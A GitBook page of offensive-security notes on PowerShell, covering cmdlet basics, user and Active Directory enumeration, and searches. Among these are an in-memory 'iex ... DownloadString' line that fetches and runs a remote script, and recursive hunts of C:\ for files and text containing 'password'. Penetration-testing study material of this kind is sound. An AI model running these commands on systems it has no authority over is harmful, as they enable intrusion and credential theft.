👨‍💻
Hacking Notes
  • Hacking Notes
  • đź’…One-Liners
  • ⚔️Offensive
    • Exploit Workflow
    • Recon
      • OSINT
      • DNS
        • Domain Discovery
      • Layer 2 Config and Analysis
      • Port Scanning and Discovery
      • Port Attacks
      • Link it all together
    • Payloads
      • MSFVenom
      • Reverse Shells
    • Websites
      • Enumeration
      • Injection/LFI
      • Session Management
      • Brute Forcing
      • JavaScript & XSS
      • SSRF
      • XXE
      • PHP
    • Password Attacks
      • Brute Forcing
      • Mimikatz
      • Password Cracking
      • Hash Extraction
      • Wordlist Generation
    • Databases
      • SQL
      • Mongodb
    • Microsoft Windows Exploits
      • Enumeration
      • Powershell
      • Cmd
      • Privilege Escalation
      • Active Directory
      • Bloodhound
    • Social Engineering
    • Netcat & Socat
    • File Transfers
    • Metasploit
      • Writing Modules
    • PS Empire
    • Priv Escalation
    • Post Exploitation
    • Pivoting
    • Certs and Secrets
    • NGROK
    • Misc.
  • 🛡️Defensive
    • Defensive Notes
    • Windows Forensics
      • Program Execution Artifacts
      • ASEP Locations
      • Event Logs
    • Linux Forensics
    • Network Forensics
      • tshark
      • Wireshark Filters
    • Memory Forensics
    • Stego
    • Malware Analysis
    • Volatility
  • 🌩️Cloud
    • Scope and Shared Responsibility
    • AWS CLI
    • Azure CLI
    • SaaS Attacks
    • PaaS
  • ⌨️Programming
    • Programming Notes
    • Examples and Quick Scripts
    • PowerShell
    • Pwn
      • Windows Pwn
    • Python
      • Basic Python
      • Modules
      • Working with Files
      • Networking
      • Attack Related
      • Scapy
        • Using Scapy
        • Reading PCAP
    • C
      • Code Examples
      • GDB
    • PHP
Powered by GitBook
On this page
  • Basics
  • Getting Help
  • Pipeline Objects
  • Enumerate Local Users
  • Enumerate AD Users
  • Searching
  • Navigate Registry
  • Networking
  • Speaking to the Users!

Was this helpful?

  1. Offensive
  2. Microsoft Windows Exploits

Powershell

Basics

Use Get-Member to list all properties and methods of an object!

get-command set*    # Searches for all cmdlets that start with "set"
alias               # List all aliases in shell
Get-ChildItem       # Same as ls, dir, and gci
Copy-Item           # Same as cp, copy, and cpi
Move-Item           # Same as mv, move, and mi
Select-String       # Same as sls and similar to grep
Get-Help            # Get help!!
Get-Content         # Same as cat, type, gc
Get-Process         # Same as ps, gps
Get-Location        # Same as pwd, gl
Get-Member          # Get properties and methods of objects - USEFUL!!!!
ps | format-list -property name, id, starttime    # Formatted list of process properties
ls env:             # List all PS environment variables
ls variable:        # List all PS variables

Getting Help

help gci                # displays help for Get-ChildItem
help gci -detailed      # Very verbose help information
help gci -examples      # Examples on how to USE it!!!
help gci -full          # Pretty much everything it has about it
Remove-Item *.* -WhatIf    # Explains what WOULD happen, but not actually do it

Pipeline Objects

Used to help automate between operations in a pipe. The % is an alias for ForEach-Object command. The current object in an array of objects is referred to as $_. Pipeline objects can be filtered with the ? alias for Where-Object. Command below will write out all names and PIDs of processes returned by ps alias.

ps | gm        # Find all properties and methods first
ps | % {write-host "name is" $_.name " and pid is " $_.ID}
ps | ? {write-host "Running PID name is " $_.status -eq "running"}

# Counting loops to move between two sets of numbers
1..10 | % {echo $_}
1..255 | % {ping -n 1 192.168.0.$_ | select-string ttl}

Enumerate Local Users

Enumerate the local users on the machine and print out important information about their accounts.

Get-LocalUser | Select-Object Name, LastLogon, PasswordLastSet, Enabled, PasswordRequired, PrincipalSource, Description | Format-Table -AutoSize

Enumerate AD Users

iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

Searching

Looking for files and directories.

# Search the entire C:\ dir for anything with "password" in the filename. Put stderr in null where it belongs
gci -recurse C:\ password 2>$null | % {echo $_.fullname}

# Select-string works similar to grep
select-string -path C:\Users\*.txt -pattern password

# Put both together! Look in each file for the string "password"
gci -recurse C:\ | % {select-string -path $_ -pattern password} 2>$null

Navigate Registry

# Can navigate Reg just like the file system using tab completion
cd HKLM:\

Launch Browsers and reach a specific page

"C:\Program Files\Internet Explorer\iexplore.exe" m4lwhere.org
"C:\Program Files\Mozilla Firefox\firefox.exe" m4lwhere.org

Networking

Quick and dirty way to check if a port is open on a remote computer

New-Object System.Net.Sockets.TCPClient –Argument "10.0.0.1","389"

Speaking to the Users!

This is a hilarious way to download a random cat fact and have it speak to the user through the speaker.

Add-Type -AssemblyName System.Speech
$SpeechSynth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$SpeechSynth.SelectVoice("Microsoft Zira Desktop")
$Browser = New-Object System.Net.WebClient
$Browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$CatFact = (ConvertFrom-Json (Invoke-WebRequest -Verbose -Uri https://catfact.ninja/fact -UseBasicParsing))
$CatFact.fact
$SpeechSynth.Speak("Did you know ?")
$SpeechSynth.Speak($CatFact.fact)
PreviousEnumerationNextCmd

Last updated 2 years ago

Was this helpful?

We can import the signed Microsoft ActiveDirectory module into PowerShell directly in memory to enumerate AD users and systems. This leverages the signed module kept at . After importing we have access to all AD commands in PowerShell.

⚔️
https://github.com/samratashok/ADModule